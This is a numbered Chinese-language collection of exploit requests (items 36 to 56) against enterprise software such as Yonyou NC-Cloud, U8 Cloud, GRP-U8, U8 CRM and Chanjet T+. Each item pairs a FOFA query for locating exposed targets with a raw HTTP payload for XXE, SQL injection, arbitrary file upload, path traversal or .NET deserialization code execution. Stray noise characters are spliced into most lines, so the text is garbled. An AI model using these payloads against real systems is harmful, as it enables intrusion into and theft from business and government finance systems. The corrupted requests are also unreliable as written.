FOFA:app="用友-NC-Cloud"8 R8 c" F2 m5 X* u! V& k# P! ?
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
9 b$ e: M: R% j5 m: C% ?9 OHost: 203.25.218.166:8888
( o" }* }. U+ a0 {) v3 p! V& l2 tUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
) u# s& D5 j7 C# x( G1 @Accept-Encoding: gzip, deflate
# ^+ g# S5 G: ]Accept: */*
/ q/ Y+ d, W3 P9 DConnection: close) G6 O; ]4 B: G5 y1 P- g7 C n
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
! Z5 h C0 L( i& HContent-Length: 190
2 T! w' A( n# x, M0 M1 kContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df04 |2 x; G v4 n; x
& g, N. F- ~( H--fd28cb44e829ed1c197ec3bc71748df0
6 o( c# Q- X* \9 yContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
, r. N; W T, B7 W7 @, r. q; n* |% k& a. J0 E
<%out.println(1111*1111);%>) Q) k; O% d$ V
--fd28cb44e829ed1c197ec3bc71748df0--
8 Y0 A9 v P7 c% I" _: x
6 \4 i$ l0 o& @
& C: N' c/ v8 n8 A+ M' M# \36. 用友NC-Cloud soapFormat XXE/ g H- Z2 R; {( G
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"+ Q: X3 d0 Z H: j
POST /uapws/soapFormat.ajax HTTP/1.1 C( P. H0 e7 K% Y, t, v$ {( {; @ B
Host: 192.168.40.130:89894 X2 I4 G' ?' ]* N. o$ T; r Z' `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0: X& Z4 j2 z3 H8 [/ f) Q/ [* j4 E
Content-Length: 263
& u6 ^2 V3 T1 R6 w9 V+ ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 b/ _( ?; [0 X! B6 N" A7 X
Accept-Encoding: gzip, deflate
( _0 h1 R) X5 Z/ T+ f% KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' M# w' j( [" }! p; sConnection: close
: f: k0 F& b1 e$ f( ZContent-Type: application/x-www-form-urlencoded6 V3 V$ y. `! B+ N% I
Upgrade-Insecure-Requests: 1
9 v1 _6 g# `! [$ Y8 {; K6 t; }
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a% |6 R- ]- A3 Q- I) w5 d) s) ?7 J
q/ I( \7 |0 _: K2 v7 K# `1 b# c4 U+ X s
37. 用友NC-Cloud IUpdateService XXE
2 a- ]6 ~: ^- o3 wFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"/ z: Y" v) c" v
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.16 ]6 w1 u* Q0 i% O" L7 E" z5 _
Host: 192.168.40.130:8989# Y" E% T; V9 ]- Z; t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.362 d: j; F- I% q- N) M* u) H( R
Content-Length: 421
) Z8 f' V: W; J0 s: K, S& tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
/ r* H2 }8 r1 K2 G: g' hAccept-Encoding: gzip, deflate$ C1 z6 Y+ c0 s5 h
Accept-Language: zh-CN,zh;q=0.93 ]. P/ y1 ]" ^& Q& J
Connection: close
; a/ W/ j# }9 \; V GContent-Type: text/xml;charset=UTF-8
- ]5 p* x ]' u# h. m) B- ZSOAPAction: urn:getResult% D, i# P0 }2 n
Upgrade-Insecure-Requests: 1
& l' A& Y( p; I- G/ A0 R; W+ |
" u; S3 D3 f1 V<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
# v B/ R0 I# @% S4 ]& P1 G. Y<soapenv:Header/>
6 A: m+ c4 M" m<soapenv:Body>* r8 {' K$ P2 U8 d8 @, e
<iup:getResult>
& W8 R4 q! I* S6 |4 H( ]<!--type: string-->* [ c* o- u; _; c
<iup:string><![CDATA[: K& g5 x/ m {" K
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>% ]( Z6 o8 \# T3 R
<xxx/>]]></iup:string>. }. s& K9 c% k. @
</iup:getResult>
) j( }( M8 a) q( f$ F</soapenv:Body>
/ h8 G o# V, |$ a</soapenv:Envelope># K3 Q$ m+ y; y
3 Z% ~) u6 U# z8 b) K% X# I
* C" a3 Y8 {8 r5 G2 N, v6 K* Y
1 x% T! |* ?9 D. D
38. 用友U8 Cloud smartweb2.RPC.d XXE
% L$ `! q9 h5 b2 ^9 xFOFA:app="用友-U8-Cloud"
+ q8 T9 G' x9 Q$ D9 d+ a) OPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
' d0 x; n9 v, f9 p7 f; ? jHost: 192.168.40.131:80887 ]7 s1 M' o' A# ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25) S% c1 \# R' E4 [; t1 f0 `0 w5 {
Content-Length: 260- Z# {! Q. b4 q1 \" F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
7 ]( M2 f4 D7 e: [& m" WAccept-Encoding: gzip, deflate V7 ~2 T, {4 z L" G8 S
Accept-Language: zh-CN,zh;q=0.9" d. x- B1 M. |2 S9 M! \
Connection: close0 y# R6 q6 b9 x; D4 s% X" e
Content-Type: application/x-www-form-urlencoded
4 u/ ~" J, S4 O2 Z
6 `9 S; }0 D6 e+ @& X# y9 c__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
$ |1 N! j. |! [1 d, q6 c& b: Y" A1 v: c0 }
0 d* ~& c& s" Y- A' [* q& f$ G39. 用友U8 Cloud RegisterServlet SQL注入
; N) d4 U& L" b+ i# l! h5 Y! n+ r4 XFOFA:title="u8c"
2 A; K; f0 `# UPOST /servlet/RegisterServlet HTTP/1.1
$ H9 W( C7 j8 Q& O% Y7 WHost: 192.168.86.128:8089- r2 S T. o% x. M$ ?: e% I7 i/ F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.369 u2 \$ Q8 e) a1 U* M; X! X
Connection: close8 Y: P( |3 I* ]6 [# i8 y1 C/ e
Content-Length: 85
; ^# J6 z+ z3 F& _9 a% qAccept: */*
9 m2 v, J& g2 F( W! q6 I2 y$ jAccept-Language: en% I- U# w* t& ]( {
Content-Type: application/x-www-form-urlencoded
! s2 y" H A( D) z# gX-Forwarded-For: 127.0.0.10 P+ \- l& R+ H3 A
Accept-Encoding: gzip ^# q2 t1 c F: y/ ]. z$ L# o
+ f" _. S) ~$ V7 N& J6 S: g
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
6 T. `. p) ~6 e5 S4 I0 H. x# G
( |7 b' g9 O F7 O/ M- \. v% @' r/ N! ~$ _; Z3 B1 z+ U, X& g& U
40. 用友U8-Cloud XChangeServlet XXE& C+ Q+ f" L, B* L' B: V
FOFA:app="用友-U8-Cloud"- S) M9 y) S+ O
POST /service/XChangeServlet HTTP/1.1/ @1 w( {! X) Q# Q) V2 a
Host: x.x.x.x
- N! M/ | \+ ^$ VUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36$ U) O9 S7 v& m& C% ~# `# O
Content-Type: text/xml
2 N; y9 T3 }3 H( }Connection: close9 Z' `9 I- T7 M3 i2 _
* a6 @8 H0 b. d* t* ~3 |8 L6 k. x
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>/ W% g# C( D/ O# z- k
- E% E3 t2 q7 ^( _, v
* H9 `+ o9 l$ L$ }$ N; k; m41. 用友U8 Cloud MeasureQueryByToolAction SQL注入0 A; p: [. ?) Z1 n; z- e Y
FOFA:app="用友-U8-Cloud"& z# x. r2 d& \) ~+ M) L
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
p. o+ f* T1 r1 q- THost:
$ V/ Z3 L5 H6 ~$ R1 g; bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 s' L. m% @4 N- n! n& S
Content-Type: application/json
/ }; f# T4 ~# V9 s1 h% h( SAccept-Encoding: gzip
1 Q3 W( K) J( R" D$ CConnection: close
: M: i. `' y7 b* q0 D
# ~& P! _6 _: J }) `
9 j9 x+ F. K# [8 m6 [* G A42. 用友GRP-U8 SmartUpload01 文件上传. Q% Y. n: v% M' s# G# [2 |( G
FOFA:app="用友-GRP-U8"& @8 g" h7 ?* D* x D4 V7 Q% a
POST /u8qx/SmartUpload01.jsp HTTP/1.1
z" A U( Q5 `9 e; u1 X& T4 y O$ [Host: x.x.x.x2 |0 s9 g3 Z" m' |4 ~5 W$ e
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
8 l# f: h- P# P+ [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
* U$ B& w. B: T8 _( b" a) u6 j8 Z1 b
PAYLOAD
) x' J9 T; x8 \ I E" i% |6 }- {* t' ^. s
1 C7 ~, [6 w, {$ e& k7 K) h# X
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml; R2 l$ j7 T* i# p. O
7 N. Y( q6 V0 J8 Q* g
43. 用友GRP-U8 userInfoWeb SQL注入致RCE' F9 X0 ^) w0 Q
FOFA:app="用友-GRP-U8"
. d2 _) s6 o( w* z$ n" cPOST /services/userInfoWeb HTTP/1.1/ a# X( \( C4 f w1 |8 G$ Z+ L
Host: your-ip
& A: _8 r; `8 i) g4 {3 }; I0 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
0 y F0 H$ f. s+ H x @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 P0 c! p4 E0 y: W
Accept-Encoding: gzip, deflate
) r" F* I8 B3 u( U. b7 ~Accept-Language: zh-CN,zh;q=0.96 d# [% C+ |* l8 k. K; H+ }1 O( q
Connection: close, z+ v+ v0 h# [+ h) k L
SOAPAction:0 W/ ?$ e2 \0 J- q- ~
Content-Type: text/xml;charset=UTF-8
9 X# G3 n. V3 n) h C" X# q1 n% \' R
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com"> [* f$ @# x9 n3 u& N2 h6 X! N& T N
<soapenv:Header/>
6 y/ [8 b" [4 X' ^$ d <soapenv:Body>; y7 K, s/ I8 t$ @( w3 C
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">4 x9 r$ n+ T+ S: b/ r8 n
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
/ x j) p8 ^! l# ? </ser:getUserNameById>
4 k: x& D' e0 U( x. q0 u </soapenv:Body>
; U' h9 A% I" a! Q6 l. X* ]% y, j! _7 R& b</soapenv:Envelope>( Z7 A( D$ I* L" W
( s! L |+ X P7 o/ `' u8 H
* u# j# e# t. Y3 d) o& n44. 用友GRP-U8 bx_dj_check.jsp SQL注入
$ b* P, \4 ^; U- m: o0 p/ AFOFA:app="用友-GRP-U8"
2 g( D2 E/ \8 z: [/ [4 p$ }GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1. z& Y, l, x F n
Host: your-ip( e6 C' ^1 _1 h9 ~4 y6 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36; \+ O' a. u" d$ y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( j. t) P3 G# H! Q% F+ WAccept-Encoding: gzip, deflate
) @, C: L( {, Q& lAccept-Language: zh-CN,zh;q=0.96 R" {, N3 |1 e
Connection: close
% S6 J6 l3 Z- r5 I) R2 b- A. a$ O/ ]$ |( J1 R
5 P& g- e9 S X( _
45. 用友GRP-U8 ufgovbank XXE! b `' W* b; M+ O- _6 A( s, I% _
FOFA:app="用友-GRP-U8"% ~5 e# f0 B( }# M3 ?" q. j
POST /ufgovbank HTTP/1.1- z7 H4 `4 T# |; x
Host: 192.168.40.130:222
+ ?1 V9 a. R' x) |. W B7 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
' A/ R( I: l1 OConnection: close( }" M4 }- P- g0 f
Content-Length: 161
1 x8 @+ \- {4 {+ SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" _$ s3 |, b1 O z% K& T* A. P0 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( i! m: C$ C+ O# s3 J: ]4 ]
Content-Type: application/x-www-form-urlencoded
6 ?$ Z9 n6 w7 \% S0 ?6 o8 mAccept-Encoding: gzip3 T5 b* }6 H, w6 X5 r4 @! D
- h9 U, ~' w# t7 v U( C" k
reqData=<?xml version="1.0"?>" M m. d, d! b
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
; p/ Y, ^' S- V: @3 a. R% ?
7 |% |& P. d& o4 |3 X1 l6 `4 ]( Y' H6 p( Q, Q+ R
46. 用友GRP-U8 sqcxIndex.jsp SQL注入. Q0 Z$ N6 Y* v8 S' A9 ?0 ]
FOFA:app="用友-GRP-U8"& V/ k% O5 \! y& x0 Z
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1* ~# L c. U6 S' Q
Host: your-ip
2 e1 _8 K( N @8 B T" X" lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
4 t" x4 l, [& l7 }' g: A5 G/ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 [2 H; B- P7 ]- W5 p5 G( I7 g/ uAccept-Encoding: gzip, deflate
% N" [ A* v! K5 B/ r2 |Accept-Language: zh-CN,zh;q=0.9& e0 P8 L8 M/ i; B: f2 \
Connection: close1 y) s/ S$ d* z6 _' [8 O3 v
" b. n/ k1 t% s5 w, t+ W$ O/ |/ J( c* g' q4 e0 x- O
47. 用友GRP A++Cloud 政府财务云 任意文件读取2 @3 F) b2 ~& j0 ^' G2 T1 c
FOFA:body="/pf/portal/login/css/fonts/style.css"
5 j+ m, e% a. G+ tGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
, [9 x0 o6 V" ]Host: x.x.x.x
7 j( _: t S# o0 hCache-Control: max-age=0
! ~% K: c+ ], tUpgrade-Insecure-Requests: 1% l6 h0 f% q$ Z- \6 T2 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 B, y5 L9 R) c4 h. {- V! q7 x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. J: i; q1 n% W
Accept-Encoding: gzip, deflate, br
/ ]6 i( j! {( _, \Accept-Language: zh-CN,zh;q=0.9
; x w; ?/ D0 G4 pIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
. y# e! t# E. u4 h2 M `8 Z ^Connection: close
1 [0 {. J+ t4 _9 u
' L! _: a+ C% K4 ^% j/ A' S4 Z; ?' Z: b0 B$ a! U1 L1 @
% {) O8 U; ]# ]2 l
48. 用友U8 CRM swfupload 任意文件上传
9 \: M2 n- n" y7 NFOFA:title="用友U8CRM"
% D, c) N/ v- x& nPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1$ U$ Z, r6 c u; N" S4 |
Host: your-ip
! a. p2 Q' K; M: I& eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.05 b9 \' U' ^! n9 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 ^" Z9 Q ^2 u3 dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 _6 y+ _5 Q0 r3 L t( q- u8 L
Accept-Encoding: gzip, deflate
, O3 v! O! f2 a* b( U ~/ NContent-Type: multipart/form-data;boundary=----269520967239406871642430066855+ X. d2 E) w8 z) l: ^
------2695209672394068716424300668553 R+ Z/ y* b* `8 p
Content-Disposition: form-data; name="file"; filename="s.php"2 A: u4 V/ f& V. u9 h+ p% i1 r4 B- B
12318 I' N7 `: U$ y' i
Content-Type: application/octet-stream$ I5 a# l& t# {8 `
------2695209672394068716424300668556 U2 _/ C0 X$ s% }9 Y
Content-Disposition: form-data; name="upload"1 B4 l/ r, [2 o2 k) z
upload
5 p: m7 D0 s# ?) Z- T+ U4 A# |------269520967239406871642430066855--: s. m, h2 n0 M" Q
+ T' M* U0 U& _0 \
& V6 G5 j, ?8 E9 |" l49. 用友U8 CRM系统uploadfile.php接口任意文件上传. m5 j+ S5 R0 E, d- w; ]+ {
FOFA:body="用友U8CRM"$ T/ R' F" V' T7 q. P
6 z$ f% {% U, a9 b7 @POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
. a6 ^$ `' k7 ~1 IHost: x.x.x.x: s" F. |7 X$ H* R+ A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, `) K+ C9 e: W+ v6 M
Content-Length: 329 E' Y! w! w1 u0 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, S6 P4 h& R7 c. k; ]/ c& Y6 Z
Accept-Encoding: gzip, deflate
8 Q* d! j, }! ^! }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: P. P) G" W; b9 w, S0 ?% }% a" w- FConnection: close
6 r6 F! s* J8 p( X0 L. n$ H; bContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
4 c& f$ p4 g# c, {( W. c3 b: O, S6 J9 I1 D
-----------------------------vvv3wdayqv3yppdxvn3w
5 t- H' h3 U: K& V, i$ `; ~1 {Content-Disposition: form-data; name="file"; filename="%s.php "
% S' q4 c6 W( H" w' i; @% AContent-Type: application/octet-stream
2 K3 P+ C6 ?. ^: e6 i l' S8 v
$ I0 H( f% ?, C$ Y* l3 }wersqqmlumloqa
1 u3 a" g7 q, X: m! L% G" p-----------------------------vvv3wdayqv3yppdxvn3w
; j/ O" R4 Y$ uContent-Disposition: form-data; name="upload"
2 X4 w( I. G4 l x& v# p
, G" \6 W- @8 Hupload
; _' l8 b+ C" Q" y7 T$ J4 W/ \-----------------------------vvv3wdayqv3yppdxvn3w-- s9 D1 P+ R/ y; X5 ^0 m6 H
5 b3 p2 {! P! C1 x$ M, D; Q- q# S
1 u! X" I1 e' `8 V8 Chttp://x.x.x.x/tmpfile/updB3CB.tmp.php
* }# y. m" Y5 P8 N. _2 `4 h0 Y2 L" U/ b0 H/ }; D
50. QDocs Smart School 6.4.1 filterRecords SQL注入
. U3 h% Z$ T. N2 z$ U4 q! U+ LFOFA:body="close closebtnmodal"+ x: O0 O& V# u, X$ P9 D* J' K2 M
POST /course/filterRecords/ HTTP/1.1
0 f3 \/ u: U; [' f+ }Host: x.x.x.x
) h% Z+ _% |+ F, b/ H6 I3 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.360 G0 k# m1 [9 `5 K/ u; ?) O; Z
Connection: close% ]" X( r, [: H4 h+ x* t
Content-Length: 224
6 I' B; N* D. W, @2 V3 t* qAccept: */*
- \ w0 i5 c; `9 I0 N. w* |Accept-Language: en
. [: ]9 a0 s& |% Q' i$ J2 d8 {Content-Type: application/x-www-form-urlencoded, Z' t9 t; _/ m) p; T/ ]
Accept-Encoding: gzip
8 d4 Z( e. q3 s j# _( E x/ k2 U2 K
# p/ X6 ~1 \2 o; D) c$ v2 Y3 Ksearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
. H$ g9 B' V6 f9 m! \0 n# j% h$ E) V. q, U1 H3 s; ~) z
6 d6 E0 |* a( z
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入, x& d/ L- `! Z# b; b9 c0 N
FOFA:app="云时空社会化商业ERP系统"
& d& Q7 F! J; TGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
$ {$ ]# O4 j; h+ Y# ?Host: your-ip( A; D i$ w* `) F) a6 X/ D8 c- B
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
2 |+ Z/ B$ q% PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
6 x4 Z& h Z; H& E0 w+ \Accept-Encoding: gzip, deflate
g% ~4 ]$ \1 a" z: i8 @2 f6 SAccept-Language: zh-CN,zh;q=0.9
0 d9 l; M7 C4 ~$ j2 D0 L3 S5 AConnection: close" R O5 _5 U0 z$ O' P+ c
& `" ~6 J2 d0 g1 H. F8 L( V
. s$ ]# }5 j$ A& D" ]52. 泛微E-Office json_common.php sql注入
% ], H0 }& z& p* c1 p: {; r. MFOFA:app="泛微-EOffice"2 E- ~& u+ N0 o ?; r; l8 A. N9 ]
POST /building/json_common.php HTTP/1.1
4 o: g: o( N. S9 J3 pHost: 192.168.86.128:8097' t7 U- [, |; }6 o! q
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' Q5 J# y+ ~1 N2 `Connection: close
8 T' c) ~; q6 M/ ]* Y$ r* I/ GContent-Length: 87# ]" Q1 {) M- e! C" i1 }
Accept: */*
. d6 r& H& m/ c, y5 ~Accept-Language: en f; B, W2 \; w8 j/ {; c* H9 @
Content-Type: application/x-www-form-urlencoded7 c1 X- X! k- @; o |, {
Accept-Encoding: gzip
) r& o) d7 K4 j; H% o
- _+ ~; [! C3 btfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
$ O3 z- S: z2 S5 Y4 D
' G8 D, E% {8 N6 C& q
, @, n0 Z" C( B0 A53. 迪普 DPTech VPN Service 任意文件上传# J7 G% Z' D, D6 P, \
FOFA:app="DPtech-SSLVPN"
& @# }7 u y2 ]- ^/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd, q# p9 u B& R9 d8 Y6 `# r
: {! F0 ^* f" ~2 D
8 U$ e8 m7 K' v1 e4 p54. 畅捷通T+ getstorewarehousebystore 远程代码执行3 }4 [7 g0 U# t/ s
FOFA:app="畅捷通-TPlus"$ {' E3 @( F J, p$ G0 i: s! m
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件8 Z0 o' Y& O6 O8 o' ~9 n1 K
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"7 B5 U' ~; S$ s! _
2 o- }# R5 R$ ^) e
$ A# e& j8 E8 Y0 @" _8 K完整数据包7 O' [3 D$ |( f/ U' G6 K, d V, C2 {
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1; o1 l& x' X4 p, c
Host: x.x.x.x5 _* d& T: [5 n) e3 p
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F7 k7 ], a+ u4 G! t2 A w; T$ y
Content-Length: 593! H9 y' X I( P3 Y! L; Z }1 [
& t0 M0 F" S# I( a; k# F{
3 E) [# a' x- L5 C"storeID":{4 `! F# ^. U; d/ _1 }
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
/ B3 A* u) ^/ s! N: E "MethodName":"Start",% B0 e& h/ [( A. u
"ObjectInstance":{1 C/ l8 U# L) h5 s. Z) R6 A; S3 Z
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
* E2 \; I. T3 F; f1 N& a; _ "StartInfo":{2 c: f% Y, g' y) q0 C; W6 `' O2 S
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," v" l M& {) ^- I7 z
"FileName":"cmd",
/ E/ d& L5 ]6 `4 V9 {0 g" p "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
4 t# q! ^4 G, u" h3 t" D6 l$ p- ~ }4 h8 ]/ W$ L4 b# R! f
}4 J( R$ m4 p* ^4 _8 c
}
5 T; \# N5 T: U" `/ \! _# s4 p/ ]}
* u5 f, [( L' A1 o6 g& |
e/ p$ Z8 p1 f o6 F3 d! b2 W% n- r* u4 C
第二步,访问如下url
9 i) b" f( O6 y# L$ ?* n/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt# R' `; _4 X& w6 v' m# j+ A
: d# R1 v$ K, a2 f h* t( f- l1 Q5 _! K8 S
55. 畅捷通T+ getdecallusers信息泄露
% a2 r7 v N9 y8 s' IFOFA:app="畅捷通-TPlus"" E7 e8 S' V1 B( c+ Z, R8 r
第一步,通过
! z8 a' d# H4 l. ~) q/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie$ C/ t& g! i+ ^$ ?$ [" b
第二步,利用获取到的Cookie请求. ^3 P6 F" z0 ^% |' E, ?& @" [
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
" I! v/ s+ M5 x' `/ x( O2 A2 C* H* y3 p. B% q
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
8 {2 B2 R7 f; u7 W* P, m: WFOFA: app="畅捷通-TPlus"
0 Y+ T( `- B% C1 RPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
$ i6 K. h# j( i$ H8 {" UHost: x.x.x.x
